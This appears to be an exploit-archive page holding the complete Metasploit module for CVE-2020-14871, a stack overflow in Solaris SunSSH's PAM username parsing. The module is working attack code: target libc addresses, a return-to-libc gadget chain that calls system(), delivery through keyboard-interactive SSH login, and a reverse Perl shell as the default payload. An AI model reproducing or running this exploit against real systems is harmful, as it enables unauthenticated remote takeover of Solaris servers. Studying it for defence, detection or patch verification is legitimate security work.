
CVE-2020-14871 Oracle Solaris SunSSH PAM parse_user_name() 缓冲区溢出漏洞



EXP

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
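class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  # AutoCheck runs #check before #exploit; CheckModule delegates that check to
  # the auxiliary module named in DefaultOptions['CheckModule'].
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::CheckModule
  include Msf::Exploit::Remote::SSH

  # Module metadata. The `[`/`]` stripped from the original listing are
  # restored: Author, References, Targets and each Notes value are arrays in
  # the Metasploit info hash, and target/datastore lookups use `[]`.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in the Solaris PAM
          library's username parsing code, as used by the SunSSH daemon when the
          keyboard-interactive authentication method is specified.

          Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox,
          VMware Fusion, and VMware Player. Bare metal untested. Your addresses
          may vary.
        },
        'Author' => [
          'Jacob Thompson', # Analysis
          'Aaron Carreras', # Analysis
          'Jeffrey Martin', # Testing
          'Hacker Fantastic', # PoC
          'wvu' # Exploit
        ],
        'References' => [
          ['CVE', '2020-14871'],
          ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html'],
          ['URL', 'https://hacker.house/lab/cve-2020-18471/'],
          ['URL', 'https://twitter.com/hackerfantastic/status/1323431512822435841']
        ],
        'DisclosureDate' => '2020-10-20', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => true,
        'Payload' => {
          # Bytes the cmd/perl encoder must keep out of the payload; the linked
          # parse_user_name() source is the reason (presumably NUL, tab and
          # space terminate the parsed name -- confirm against the link).
          # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617
          'BadChars' => "\x00\x09\x20",
          'Encoder' => 'cmd/perl'
        },
        # The two targets share the same SSH banner and differ only in the
        # libc base used by #ret2libc, so #check cannot tell them apart.
        'Targets' => [
          [
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware',
            {
              'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',
              'LibcBase' => 0xfeb90000
            }
          ],
          [
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox',
            {
              'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',
              'LibcBase' => 0xfeb80000
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_perl',
          'SSH_TIMEOUT' => 2,
          'CheckModule' => 'auxiliary/scanner/ssh/ssh_version'
        },
        # Declared side effects: a mis-targeted attempt crashes sshd (which is
        # restarted), and every attempt is a failed keyboard-interactive login
        # that lands in the host's auth logs and can trigger account lockout.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ACCOUNT_LOCKOUTS, IOC_IN_LOGS]
        }
      )
    )
  end

  # Runs the banner scan configured in DefaultOptions['CheckModule'] and then
  # compares the reported ident string with the selected target's 'Ident'.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the banner matches the
  #   target, Safe when it does not, otherwise whatever the scanner returned.
  #   A matching banner only identifies the build, not the patch level, which
  #   is why this stops at Appears rather than Vulnerable.
  def check
    # Run auxiliary/scanner/ssh/ssh_version
    checkcode = super

    return checkcode unless checkcode == CheckCode::Detected

    unless target['Ident'] == checkcode.details[:ident]
      return CheckCode::Safe("#{target.name} is an incompatible target.")
    end

    CheckCode::Appears("#{target.name} is a compatible target.")
  end

  # Starts an SSH session with keyboard-interactive auth and an empty initial
  # username; on Solaris the "password" answer is really the username prompt,
  # so it carries the buffer built by #ret2libc.
  #
  # The rescues map the client outcome: an authentication failure is reported
  # as Safe, a disconnect usually means the wrong LibcBase target, and a
  # connection timeout is treated as success (the payload ran instead of the
  # login completing).
  def exploit
    print_status("Exploiting #{target.name}")

    ssh_client_opts = ssh_client_defaults.merge(
      port: rport,
      auth_methods: 'keyboard-interactive',
      password: ret2libc, # HACK: This is really the username prompt on Solaris
      timeout: datastore['SSH_TIMEOUT']
    )

    ssh_client_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    print_status("Yeeting #{datastore['PAYLOAD']} at #{peer}")

    # Empty initial username
    Net::SSH.start(rhost, '', ssh_client_opts)
  rescue Net::SSH::AuthenticationFailed
    print_error(CheckCode::Safe.message)
  rescue Net::SSH::Disconnect
    print_warning('Disconnected, target selection may be incorrect!')
  rescue Net::SSH::ConnectionTimeout
    # Do nothing on success
  end

  # Builds the overlong username that overflows parse_user_name().
  # XXX: No ASLR, but libc base changes...
  #
  # Layout: 516 bytes of filler, then a chain of return addresses computed
  # from the selected target's 'LibcBase' (two of them are absolute rather
  # than libc-relative), followed by the encoded command payload.
  #
  # @return [String] the raw buffer sent as the username-prompt answer
  def ret2libc
    buf = rand_text(516)
    buf << p32(target['LibcBase'] + 0x23904) # add esp, 8; ret
    buf << rand_text(4)
    buf << p32(0x08040101) # ecx
    buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret
    buf << p32(target['LibcBase'] + 0x256d0) # exit(3)
    buf << p32(target['LibcBase'] + 0x91edf) # system(3)
    buf << rand_text(4)
    buf << p32(target['LibcBase'] + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret
    buf << payload.encoded
  end

  # Packs a 32-bit address as four little-endian bytes ('V').
  #
  # @param addr [Integer] address to pack
  # @return [String] four-byte binary string
  def p32(addr)
    [addr].pack('V')
  end

end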
